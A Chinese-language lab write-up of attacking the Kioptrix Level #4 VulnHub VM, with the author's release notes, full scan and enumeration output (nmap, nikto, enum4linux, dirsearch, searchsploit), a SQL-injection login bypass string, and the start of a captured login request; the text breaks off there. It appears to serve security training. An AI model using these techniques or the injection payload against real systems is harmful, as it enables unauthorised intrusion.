• vuInhub靶场实战系列--Kioptrix Level #4




    今日测试内容渗透Kioptrix Level #4靶机:

    Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #4靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、SQL注入、udf系统提权等内容。

    Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

    1. It’s possible to get root remotely [ Edit: sorry not what I meant ]
      1a. It’s possible to remotely compromise the machine
      Stays within the target audience of this site
      Must be “realistic” (well kinda…)
      Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.
      I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
      Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
      I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
      – A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.
      – Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
      Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
      Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
      So I hope you enjoy this one.
      The Kioptrix Team
      Source: http://www.kioptrix.com/blog/?p=604
      Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive

    虚拟机之间再次存在很长的延迟,但这无济于事。 工作,家庭必须是第一位的。 博客和兴趣爱好排在列表的下方。 这些事情并不像人们想象的那么容易。 必须为这些挑战投入时间和一些计划,以确保:
    1a. 可以远程破坏机器
    3.应该为我复习。 无论是PHP还是MySQL用法等等。我已经有一段时间没做过了。
    我也很难导出这个。 因此,请花时间阅读本文结尾处的评论。
    秉承事物的精神,这一挑战与其他挑战有所不同,但仍处于轻松的境界。 我知道自己重复一遍,但必须始终清楚:这些VM是针对初学者的。 这是一个起点。
    我很想编写一些小型的自定义应用程序,以供人们使用。 但我是管理员,不是编码员。 学习/编码这样的应用程序将花费太多时间。 并不是说我永远不会尝试做一个,但我不会屏住呼吸。 如果有人想要更艰巨的挑战,我敢肯定,Inter-tube会将他们抱在某个地方。 或者,您也可以随时注册Offsec的PWB课程。无耻的插头
    – 我必须说几件事。 我使用新平台制作了这张图片。 希望一切正常,但我无法测试所有内容。 最初,VM在启动时很难获得IP。 由于某种原因,NIC无法启动,并且机器留有环回接口。 我希望我解决了这个问题。 如果这个启动需要一点时间,请不要感到惊讶。 它正在尝试获取IP。 有点耐心。 有人为我测试了映像,还报告说VM开机后就挂了。 重新启动后一切都很好。 只有一个人报告了此消息,因此希望这不是主要问题。 如果计划在vmFusion上运行它,则可能需要转换想象以适合您的融合版本。
    – 还为使用Hyper-V的用户添加了VHD文件以供下载。 你们可能需要将网络适配器更改为“旧版网络适配器”。 我已经对该文件进行了测试,这个文件似乎对我来说还算不错…如果您遇到问题,或者由于某种原因它无法正常工作,请发送电子邮件comms [=]kioptrix.com
    感谢Hackfest.ca的Patrick也运行了VM并报告了一些问题。 Swappage和@Tallenz也这样做。 所有的帮助都是感激的家伙
    Note:只是一个虚拟硬盘。 您需要创建一个新的虚拟机并附加现有的硬盘驱动


    1.1 靶场信息


    1.2 靶场配置


    2.1 主机发现

    2.1.1 netdiscover

    └─# netdiscover -r
     Currently scanning: Finished!   |   Screen View: Unique Hosts                                                        
     5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                      
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
     -----------------------------------------------------------------------------     00:0c:29:41:10:00      1      60  VMware, Inc.                                                       ae:d5:7e:a8:51:6a      2     120  Unknown vendor                                                      a0:54:f9:b3:23:54      2     120  Unknown vendor  

    2.1.2 arp-scan主机扫描

    └─# arp-scan -l
    Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4:
    Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)	00:0c:29:41:10:00	VMware, Inc.	ae:d5:7e:a8:51:6a	(Unknown: locally administered)	22:cb:7f:9b:2c:c1	(Unknown: locally administered)
    3 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.10.0: 256 hosts scanned in 2.388 seconds (107.20 hosts/sec). 3 responded


    2.2 端口扫描

    └─# nmap -sC -sV -oA Kioptrix4
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:34 EDT
    Nmap scan report for
    Host is up (0.00028s latency).
    Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
    22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
    |_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
    80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    |_http-title: Site doesn't have a title (text/html).
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
    MAC Address: 00:0C:29:41:10:00 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Host script results:
    | smb-os-discovery: 
    |   OS: Unix (Samba 3.0.28a)
    |   Computer name: Kioptrix4
    |   NetBIOS computer name: 
    |   Domain name: localdomain
    |   FQDN: Kioptrix4.localdomain
    |_  System time: 2024-06-12T16:34:31-04:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    |_smb2-time: Protocol negotiation failed (SMB2)
    |_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 48.34 seconds


    2.3 指纹识别

    └─# whatweb -v
    WhatWeb report for
    Status    : 200 OK
    Title     : <None>
    IP        :
    Country   : RESERVED, ZZ
    Summary   : Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], PasswordField[mypassword], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], X-Powered-By[PHP/5.2.4-2ubuntu5.6]
    Detected Plugins:
    [ Apache ]
    	The Apache HTTP Server Project is an effort to develop and 
    	maintain an open-source HTTP server for modern operating 
    	systems including UNIX and Windows NT. The goal of this 
    	project is to provide a secure, efficient and extensible 
    	server that provides HTTP services in sync with the current 
    	HTTP standards. 
    	Version      : 2.2.8 (from HTTP Server Header)
    	Google Dorks: (3)
    	Website     : http://httpd.apache.org/
    [ HTTPServer ]
    	HTTP server header string. This plugin also attempts to 
    	identify the operating system from the server header. 
    	OS           : Ubuntu Linux
    	String       : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string)
    [ PHP ]
    	PHP is a widely-used general-purpose scripting language 
    	that is especially suited for Web development and can be 
    	embedded into HTML. This plugin identifies PHP errors, 
    	modules and versions and extracts the local file path and 
    	username if present. 
    	Version      : 5.2.4-2ubuntu5.6
    	Module       : Suhosin-Patch
    	Version      : 5.2.4-2ubuntu5.6
    	Google Dorks: (2)
    	Website     : http://www.php.net/
    [ PasswordField ]
    	find password fields 
    	String       : mypassword (from field name)
    [ X-Powered-By ]
    	X-Powered-By HTTP header 
    	String       : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string)
    HTTP Headers:
    	HTTP/1.1 200 OK
    	Date: Wed, 12 Jun 2024 20:38:05 GMT
    	Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    	X-Powered-By: PHP/5.2.4-2ubuntu5.6
    	Content-Length: 1255
    	Connection: close
    	Content-Type: text/html


    • Apache[2.2.8],
    • HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch],
    • PasswordField[mypassword],
    • PHP[5.2.4-2ubuntu5.6][Suhosin-Patch],
    • X-Powered-By[PHP/5.2.4-2ubuntu5.6]

    2.4 目录扫描

    2.4.1 dirb目录扫描

    └─# dirb
    DIRB v2.22    
    By The Dark Raver
    START_TIME: Wed Jun 12 08:40:08 2024
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    GENERATED WORDS: 4612                                                          
    ---- Scanning URL: ----
    + (CODE:403|SIZE:326)                                                                                                                                                              
    ==> DIRECTORY:                                                                                                                                                                      
    + (CODE:200|SIZE:1255)                                                                                                                                                                
    + (CODE:200|SIZE:1255)                                                                                                                                                            
    ==> DIRECTORY:                                                                                                                                                                        
    + (CODE:302|SIZE:0)                                                                                                                                                                  
    + (CODE:302|SIZE:220)                                                                                                                                                                
    + (CODE:403|SIZE:331)                                                                                                                                                         
    ---- Entering directory: ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
    ---- Entering directory: ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
    END_TIME: Wed Jun 12 08:40:33 2024
    DOWNLOADED: 4612 - FOUND: 6

    FOUND: 6,发现6个目录


    2.4.2 dirsearch目录扫描

    └─# dirsearch -u -e * -x 404,403
    /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
      from pkg_resources import DistributionNotFound, VersionConflict
      _|. _ _  _  _  _ _|_    v0.4.3
     (_||| _) (/_(_|| (_| )
    Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
    Output File: /home/kali/reports/_192.168.1.6/_24-06-12_08-40-50.txt
    [08:40:50] Starting: 
    [08:41:17] 200 -  109B  - /checklogin                                       
    [08:41:17] 200 -  109B  - /checklogin.php                                   
    [08:41:22] 200 -  298B  - /database.sql                                     
    [08:41:33] 301 -  350B  - /images  ->           
    [08:41:33] 200 -  930B  - /images/                                          
    [08:41:40] 302 -    0B  - /logout/  ->  index.php                           
    [08:41:40] 302 -    0B  - /logout  ->  index.php                            
    [08:41:42] 302 -  220B  - /member/  ->  index.php                           
    [08:41:42] 302 -  220B  - /member  ->  index.php
    [08:41:42] 302 -  220B  - /member/login  ->  index.php
    [08:41:42] 302 -  220B  - /member/admin.asp  ->  index.php
    [08:41:42] 302 -  220B  - /member/logon  ->  index.php
    [08:41:42] 302 -  220B  - /member/login.rb  ->  index.php                   
    [08:41:42] 302 -  220B  - /member/signin  ->  index.php                     
    [08:41:42] 302 -  220B  - /member/login.html  ->  index.php                 
    [08:41:42] 302 -  220B  - /member.php  ->  index.php                        
    [08:41:42] 302 -  220B  - /member/login.jsp  ->  index.php                  
    [08:41:42] 302 -  220B  - /member/login.asp  ->  index.php                  
    [08:41:42] 302 -  220B  - /member/login.py  ->  index.php
    [08:41:42] 302 -  220B  - /member/login.39772.zip  ->  index.php            
    Task Completed


    2.5 漏洞切入点

    2.5.1 访问首页


    • username:john
    • password:1’ or ‘1’ =’ 1

    2.5.2 nmap漏洞扫描

    └─# nmap -A -v -sS -Pn -T4 --script=vuln
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:47 EDT
    NSE: Loaded 150 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 08:47
    Completed NSE at 08:47, 10.01s elapsed
    Initiating NSE at 08:47
    Completed NSE at 08:47, 0.00s elapsed
    Initiating ARP Ping Scan at 08:47
    Scanning [1 port]
    Completed ARP Ping Scan at 08:47, 0.08s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 08:47
    Completed Parallel DNS resolution of 1 host. at 08:47, 5.24s elapsed
    Initiating SYN Stealth Scan at 08:47
    Scanning [1000 ports]
    Discovered open port 22/tcp on
    Discovered open port 139/tcp on
    Discovered open port 445/tcp on
    Discovered open port 80/tcp on
    Completed SYN Stealth Scan at 08:47, 2.15s elapsed (1000 total ports)
    Initiating Service scan at 08:47
    Scanning 4 services on
    Completed Service scan at 08:47, 11.02s elapsed (4 services on 1 host)
    Initiating OS detection (try #1) against
    NSE: Script scanning
    Initiating NSE at 08:47
    Completed NSE at 08:54, 362.52s elapsed
    Initiating NSE at 08:54
    Completed NSE at 08:54, 0.09s elapsed
    Nmap scan report for
    Host is up (0.0010s latency).
    Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
    22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    | http-enum: 
    |   /database.sql: Possible database backup
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
    |_  /index/: Potentially interesting folder
    |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
    |   Found the following possible CSRF vulnerabilities: 
    |     Path:
    |     Form id: myusername
    |     Form action: checklogin.php
    |     Path:
    |     Form id: 
    |     Form action: index.php
    |     Path:
    |     Form id: myusername
    |_    Form action: checklogin.php
    | http-slowloris-check: 
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    MAC Address: 00:0C:29:41:10:00 (VMware)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Uptime guess: 0.019 days (since Wed Jun 12 08:27:20 2024)
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=199 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Host script results:
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    |_smb-vuln-ms10-061: false
    |_smb-vuln-ms10-054: false
    1   1.02 ms
    NSE: Script Post-scanning.
    Initiating NSE at 08:54
    Completed NSE at 08:54, 0.00s elapsed
    Initiating NSE at 08:54
    Completed NSE at 08:54, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 393.04 seconds
               Raw packets sent: 1450 (64.546KB) | Rcvd: 1226 (172.149KB)

    2.5.3 nikto漏洞扫描

    └─# nikto -h
    - Nikto v2.5.0
    + Target IP:
    + Target Hostname:
    + Target Port:        80
    + Start Time:         2024-06-12 08:47:42 (GMT-4)
    + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    + /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6.
    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
    + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + /database.sql: Server may leak inodes via ETags, header found with file /database.sql, inode: 148370, size: 298, mtime: Sat Feb  4 11:11:51 2012. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
    + /database.sql: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
    + /index: Uncommon header 'tcn' found, with contents: list.
    + /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
    + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
    + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
    + PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
    + /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
    + /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
    + /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /database.sql: Database SQL found.
    + /icons/: Directory indexing found.
    + /images/: Directory indexing found.
    + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
    + /member.php?vwar_root=http://blog.cirt.net/rfiinc.txt: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
    + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
    + 8908 requests: 1 error(s) and 22 item(s) reported on remote host
    + End Time:           2024-06-12 08:48:41 (GMT-4) (59 seconds)
    + 1 host(s) tested

    /database.sql: Database SQL found.

    • 用户名:john
    • 密码:1234

    2.5.4 enum4linux漏洞扫描

    └─# enum4linux 192.168..1.6
    Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:51:13 2024
     =========================================( Target Information )=========================================
    Target ........... 192.168..1.6
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
     ============================( Enumerating Workgroup/Domain on 192.168..1.6 )============================
    [E] Can't find workgroup/domain
     ================================( Nbtstat Information for 192.168..1.6 )================================
    Looking up status of
    No reply from
     ===================================( Session Check on 192.168..1.6 )===================================
    [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
    └─# enum4linux 
    Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:55:42 2024
     =========================================( Target Information )=========================================
    Target ...........
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
     ============================( Enumerating Workgroup/Domain on )============================
    [+] Got domain/workgroup name: WORKGROUP
     ================================( Nbtstat Information for )================================
    Looking up status of
    	KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
    	KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
    	KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
    	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
    	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    	MAC Address = 00-00-00-00-00-00
     ====================================( Session Check on )====================================
    [+] Server allows sessions using username '', password ''
     =================================( Getting domain SID for )=================================
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
     ===================================( OS information on )===================================
    [E] Can't get OS info with smbclient
    [+] Got OS info for from srvinfo: 
    	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
    	platform_id     :	500
    	os version      :	4.9
    	server type     :	0x809a03
     ========================================( Users on )========================================
    index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
    index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
    index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
    index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
    index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)
    user:[nobody] rid:[0x1f5]
    user:[robert] rid:[0xbbc]
    user:[root] rid:[0x3e8]
    user:[john] rid:[0xbba]
    user:[loneferret] rid:[0xbb8]
     ==================================( Share Enumeration on )==================================
    	Sharename       Type      Comment
    	---------       ----      -------
    	print$          Disk      Printer Drivers
    	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
    Reconnecting with SMB1 for workgroup listing.
    	Server               Comment
    	---------            -------
    	Workgroup            Master
    	---------            -------
    	WORKGROUP            KIOPTRIX4
    [+] Attempting to map shares on
    //$	Mapping: DENIED Listing: N/A Writing: N/A
    [E] Can't understand response:
    //$	Mapping: N/A Listing: N/A Writing: N/A
     ============================( Password Policy Information for )============================
    [+] Attaching to using a NULL share
    [+] Trying protocol 139/SMB...
    [+] Found domain(s):
    	[+] KIOPTRIX4
    	[+] Builtin
    [+] Password Info for Domain: KIOPTRIX4
    	[+] Minimum password length: 5
    	[+] Password history length: None
    	[+] Maximum password age: Not Set
    	[+] Password Complexity Flags: 000000
    		[+] Domain Refuse Password Change: 0
    		[+] Domain Password Store Cleartext: 0
    		[+] Domain Password Lockout Admins: 0
    		[+] Domain Password No Clear Change: 0
    		[+] Domain Password No Anon Change: 0
    		[+] Domain Password Complex: 0
    	[+] Minimum password age: None
    	[+] Reset Account Lockout Counter: 30 minutes 
    	[+] Locked Account Duration: 30 minutes 
    	[+] Account Lockout Threshold: None
    	[+] Forced Log off Time: Not Set
    [+] Retieved partial password policy with rpcclient:
    Password Complexity: Disabled
    Minimum Password Length: 0
     =======================================( Groups on )=======================================
    [+] Getting builtin groups:
    [+]  Getting builtin group memberships:
    [+]  Getting local groups:
    [+]  Getting local group memberships:
    [+]  Getting domain groups:
    [+]  Getting domain group memberships:
     ===================( Users on via RID cycling (RIDS: 500-550,1000-1050) )===================
    [I] Found new SID: 
    [I] Found new SID: 
    [I] Found new SID: 
    [I] Found new SID: 
    [I] Found new SID: 
    [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
    S-1-22-1-1000 Unix User\loneferret (Local User)
    S-1-22-1-1001 Unix User\john (Local User)
    S-1-22-1-1002 Unix User\robert (Local User)
    [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
    S-1-5-32-544 BUILTIN\Administrators (Local Group)
    S-1-5-32-545 BUILTIN\Users (Local Group)
    S-1-5-32-546 BUILTIN\Guests (Local Group)
    S-1-5-32-547 BUILTIN\Power Users (Local Group)
    S-1-5-32-548 BUILTIN\Account Operators (Local Group)
    S-1-5-32-549 BUILTIN\Server Operators (Local Group)
    S-1-5-32-550 BUILTIN\Print Operators (Local Group)
    [+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
    S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
    S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
    S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
     ================================( Getting printer info for )================================
    No printers returned.
    enum4linux complete on Wed Jun 12 08:56:26 2024

    2.5.5 wfuzz模糊测试

    └─# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    Total requests: 3024
    ID           Response   Lines    Word       Chars       Payload                                                                                                                                        
    000001629:   302        0 L      0 W        0 Ch        "logout"                                                                                                                                       
    000001736:   302        1 L      22 W       220 Ch      "member"                                                                                                                                       
    000002294:   301        9 L      31 W       350 Ch      "robert"                                                                                                                                       
    000001458:   301        9 L      31 W       348 Ch      "john"                                                                                                                                         
    000001350:   200        45 L     94 W       1255 Ch     "index"                                                                                                                                        
    000001337:   301        9 L      31 W       350 Ch      "images"                                                                                                                                       
    000000566:   403        10 L     33 W       326 Ch      "cgi-bin/"                                                                                                                                     
    Total time: 5.687175
    Processed Requests: 3024
    Filtered Requests: 3017
    Requests/sec.: 531.7226

    2.5.6 searchsploit搜索samba漏洞

    └─# searchsploit samba 3.        
    ------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                       |  Path
    ------------------------------------------------------------------------------------- ---------------------------------
    Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                         | osx/remote/9924.rb
    Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                           | unix/remote/22468.c
    Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                 | osx/remote/16875.rb
    Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                               | multiple/remote/10095.txt
    Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)     | unix/remote/16320.rb
    Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                   | linux/remote/9950.rb
    Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)               | linux/remote/16859.rb
    Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)             | solaris/remote/16329.rb
    Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                             | linux/dos/4732.c
    Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                    | multiple/dos/5712.pl
    Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                     | linux/remote/364.pl
    Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)              | linux_x86/remote/16860.rb
    Samba 3.3.5 - Format String / Security Bypass                                        | linux/remote/33053.txt
    Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Meta | linux/remote/21850.rb
    Samba 3.4.5 - Symlink Directory Traversal                                            | linux/remote/33599.txt
    Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                               | linux/remote/33598.rb
    Samba 3.4.7/3.5.1 - Denial of Service                                                | linux/dos/12588.txt
    Samba 3.5.0 - Remote Code Execution                                                  | linux/remote/42060.py
    Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Met | linux/remote/42084.rb
    Samba 3.5.11/3.6.3 - Remote Code Execution                                           | linux/remote/37834.py
    Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                           | linux/dos/27778.txt
    Samba < 3.0.20 - Remote Heap Overflow                                                | linux/remote/7701.txt
    Samba < 3.6.2 (x86) - Denial of Service (PoC)                                        | linux_x86/dos/36741.py
    Sambar Server 4.3/4.4 Beta 3 - Search CGI                                            | windows/remote/20223.txt
    Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access                       | windows/remote/24163.txt
    ------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results


    3.1 SQL注入

    3.1.1 Burp Suit抓登录包

    └─# vim sql.txt  
    └─# cat sql.txt  
    POST /checklogin.php HTTP/1.1
    Content-Length: 47
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
